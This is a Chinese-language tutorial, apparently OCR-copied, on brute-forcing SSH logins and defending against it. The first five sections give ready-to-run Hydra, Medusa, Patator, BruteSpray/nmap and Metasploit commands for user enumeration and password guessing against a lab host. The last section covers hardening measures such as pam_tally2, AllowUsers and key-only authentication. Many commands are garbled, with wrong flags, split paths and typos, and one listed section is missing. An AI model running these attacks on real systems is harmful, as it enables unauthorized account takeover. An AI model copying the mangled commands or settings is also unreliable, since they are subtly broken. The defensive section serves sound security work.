SSH密码暴力破解及防御实战
一、Hydra(海德拉)
1.1 指定用户破解
二、Medusa(美杜莎)
2.1 语法参数
2.2 破解SSH密码
三、Patator
3.1 破解SSH密码
四、BrutesPray
4.1 语法参数
4.2 nmap扫描
4.3 字典爆破
五、MSF
5.1 SSH模块
5.2 SSH用户枚举
5.3 SSH版本探测
5.4 SSH暴力破解
六、暴力破解防御
6.1 useradd shell [推荐]
6.2 密码的复杂性[推荐]
6.3 修改默认端口[推荐]
6.4 限止登录的用户或组[推荐]
6.5 使用sudu(推荐)
6.6 设置允许的IP访问[可选]
6.7 使用DenyHosts自动统计,并将其加入到/etc/hosts . deny
6.8 基于PAM实现登录限制[推荐]
6.9 禁用密码改用公钥方式认证
6.10 保护xshel1导出会话文件[小心]
一、Hydra(海德拉)
Hydra是世界顶级密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
1.1 指定用户破解
Examples:
hydra -1 user -P passlist. txt ftp://192.168.0.1
hydra -L userlist.txt -P defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001 :db8::1]: 143/TLS:DIGEST-MD5
hydra -1 admin -p password ftp://[192.168.0.0/24]/
hydra -L logins .txt -P pws.txt -M targets.txt ssh
root@kali:~# hydra -1 root -P pass.dic 192.168.106.134 ssh
二、Medusa(美杜莎)
Medusa是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机,用户或密码执行强力测试。Medusa和Hydra意义,属于在线密码破解工具。不同的是,Medusa的稳定性相较于Hydra好很多,但支持的模块要比Hydra少一些。
2.1 语法参数
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] 目标主机名称或者IP地址
-H [FILE] 包含目标主机名称或者IP地址文件
-u [TEXT] 测试的用户名
-U [FILE] 包含测试的用户名文件
-P [TEXT] 测试的密码
-P [FILE] 包含测试的密码文件
-C [FILE] 组合条目文件
-0 [FILE] 日志信息文件
-e [n/s/ns] n代表空密码, s代表为密码与用户名相同
-M [TEXT] 模块执行名称
-m [TEXT] 传递参数到模块
-d 显示所有的模块名称
-n [NUM] 使用非默认Tcp端口
-S 启用SSL
-r [NUM] 重试间隔时间,默认为3秒
-t [NUM] 设定线程数量
-T 同时测试的主机总数
-L 并行化,每个用户使用一个线程
-f 在任何主机上找到第一个账号/密码后,停止破解
-F 在任何主机上找到第一个有效的用户名/密码后停止审计
-9 显示模块的使用信息
-V [NUM] 详细级别(0-6)
-W [NUM] 错误调试级别(0-10 )
-V 显示版本
-Z [TEXT] 继续扫描_上一-次
2.2 破解SSH密码
root@kali:~# medusa -M ssh -h 192.168.106.134 -U root -P passlist. txt
三、Patator
Patator,强大的命令行暴力破解器。
3.1 破解SSH密码
root@kali:~# patator ssh_ login --help
Patator v0.6 (http://code . google. com/p/patator/)
Usage: ssh_ login <module-options ...> [global-options ...]
Examples:
ssh_ login host=10.0.0.1 user= root password=FILEO 0=pas swords.txt -X
ignore: mesg-' Authentication failed. '
root@kali:~# patator ssh_ login host=192.168. 106.134 user=root password=FILE0 0=passlist . txt
root@kali:~# patator ssh_ login host=192. 168.106.134 user= root password=FILE0 0=passlist.txt \
-X ignore :mesg= ' Authentication failed. '
四、BrutesPray
BruteSpray是一款基于Nmap扫描输出的gnmap/XMl文件,自动调用Medusa对服务进行爆破。
root@kali:~# apt-get update
root@kali:~# apt-get install brutespray
4.1 语法参数
-f FILE, --file FILE 参数后跟一 个文件名,解析nmap输出的GNMAP或者XML文件
-o OUTPUT, --output OUTPUT 包含成功尝试的目录下
-s SERVICE, --service SERVICE 参数后跟-个服务名,指定要攻击的服务
-t THREADS, --threads THREADS参 数后跟一数值, 指定medus a线程数
-T HOSTS, --hosts HOSTS K参数后跟一数值,指定同时测试的主机数
-U USERLIST, --userlist USERLIST 参数后跟用户字典文件
-P PASSLIST, --passlist PASSLIST 参数后跟密码字典文件
-u USERNAME, --username USERNAME 参数后跟用户名,指定一个用户名进行爆破
-p PASSWORD, --password PASSWORD 参数后跟密码,指定一个密码进行爆破
-C,–continuous 成功之后继续爆破
-i, – interactive 交互模式
4.2 nmap扫描
root@kali:~# nmap -V 192.168.106.0/24 -oX nmap 。xml
root@kali:~# nmap -A"-p22 -V 192.168.106.0/24 -oX 22. xml
root@kali:~# nmap -sP 192.168.106.0/24 -oX nmaplive. xml
root@kali:~# nmap -sV -0 192.168.106.0/24 -oX nmap. xml
4.3 字典爆破
root@kali :~# brutespray --file 22.xml -U user1ist.txt-p passlist.txt --threads 5 --hosts 5
五、MSF
Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。
5.1 SSH模块
root@kali:~# msfconsole
msf > search ssh
5.2 SSH用户枚举
msf > use auxiliary/ scanner/ssh/ssh_ enumusers
msf auxiliary(scanner/ssh/ssh_ enumusers) > set phosts 192.168.106.134
msf auxiliary(scanner/ssh/ssh_ enumusers) > set USER_ FILE /root/userlist.txt
msf auxiliary(scanner/ssh/ssh_ enumusers) > run
5.3 SSH版本探测
msf > use auxiliary/scanner/ssh/ssh_ version
msf auxiliary( scanner/ssh/ssh_ _version) > set rhosts 192. 168.106.134
msf auxiliary( scanner/ssh/ssh_ _version) > run
5.4 SSH暴力破解
msf > use auxiliary/scanner/ssh/ ssh plogin
msf auxiliary( scanner/ssh/ssh_ login) > set rhosts 192. 168.106.134
msf auxiliary(scanner/ssh/ssh_ login) > set USER_ _FILE /root/userlist . txt
msf auxiliary(scanner/ssh/ssh_ login) > set PASS_ _FILE /root/passlist.txt
msf auxiliary(scanner/ssh/ssh_ _login) > run
六、暴力破解防御
6.1 useradd shell [推荐]
[root@tianyun ~]# useradd yangge -S /sbin/nologin
6.2 密码的复杂性[推荐]
字母大小写+数字+特殊字符+20位以上+定期更换
6.3 修改默认端口[推荐]
/etc/ssh/sshd_ config
Port 22222
6.4 限止登录的用户或组[推荐]
#PermitRootLogin yes
AllowUser test
[ root@tianyun ~]# man sshd_ config
AllowUsers AllowGroups DenyUsers DenyGroups
6.5 使用sudu(推荐)
6.6 设置允许的IP访问[可选]
/etc/hosts.allow,例如sshd:192. 168.106.167:allow
PAM基于IP限制
iptables/firewalld
只能允许从堡垒机
6.7 使用DenyHosts自动统计,并将其加入到/etc/hosts . deny
6.8 基于PAM实现登录限制[推荐]
模块: pam_ tally2. so
功能:登录统计
示例:实现防止对sshd暴力破解
[root@tianyun ~]# grep tally2 /etc/pam. d/sshd
auth
required
pam_ tally2.so deny=2 even_ deny_ root root_ unlock_ time=60 unlock_ time=6
6.9 禁用密码改用公钥方式认证
/etc/ssh/sshd_ config
Pas swordAuthentication no
